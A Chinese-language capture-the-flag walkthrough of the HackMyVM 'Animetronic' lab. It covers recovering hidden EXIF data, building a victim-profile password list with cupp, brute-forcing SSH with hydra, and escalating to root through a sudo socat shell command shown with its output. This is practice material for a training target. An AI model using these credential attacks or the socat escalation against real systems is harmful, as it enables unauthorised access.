HackMyVM-Animetronic

简介

• 靶场地址：https://hackmyvm.eu/machines/machine.php?vm=Animetronic
• 难度：简单

环境

• 攻击机：kali 192.168.43.34
• 靶机：virtualbox 192.168.43.33

开始渗透

开放端口依旧是22和80

浏览一下网页，有个弹窗，别的信息好像没有了，也没什么登录口之类的，去扫一下目录吧

这里用gobuster不知道为什么一直扫不出来，可能是因为gobuster不能用http进行扫描吧
用forexbuster进行目录扫描，注意这里用https是扫不出来的，要用http进行扫描

这里扫出来两个图片文件，但是只有下面这张有隐藏信息：

网上随便找一个exif图片信息查看器，看到有隐藏的信息，一眼base64

解出来一串奇怪的字符，博主ctf打多了，用瞪眼法看出这是一个倒置的字符串。

反转过来可以得到：
message_for_michael


不知道有啥用，试着访问一下这个路径，嘿！真有信息

有一个发给michael的信息，还给了一个文件的名字，依旧访问一下，拿到了michael的个人相关信息



到这里突然断了......后来知道个人信息可以生成社工密码字典然后去爆破ssh
这里去搜了一下社工密码生成，有个cupp工具，在kali上安装一下直接用：

❯ cupp -i
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: Michael
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 19101996


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: 27 Ahmed Yasser Adam swimming
> Do you want to add special chars at the end of words? Y/[N]: n
> Do you want to add some random numbers at the end of words? Y/[N]:n
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 656 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!

拿到生成的字典之后，用hydra去爆破ssh，成功拿到账号密码。

在home下的henry文件夹下拿到第一个flag，还有一个note.txt

getshell

打开note.txt看一下

michael@animetronic:/home/henry$ cat Note.txt 
if you need my account to do anything on the server,
you will find my password in file named

aGVucnlwYXNzd29yZC50eHQK

他说要想登录henry就要找到一个文件

aGVucnlwYXNzd29yZC50eHQK
base64解码：
henrypassword.txt

• find搜一下文件
  
• 打开看一眼

michael@animetronic:/home/henry/.new_folder/dir289/dir26/dir10$ cat henrypassword.txt 
IHateWilliam

拿到密码直接登录henry：
su henry

用sudo -l看henry可用sudo执行的命令，有一个socat
去GTFObins找利用方式



没啥好说的，直接提权就完了

henry@animetronic:~$ sudo socat - exec:/bin/sh,pty,ctty,raw,echo=0
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 

拿到root权限，结束

靶机知识点

1.forexbuster
2.socat提权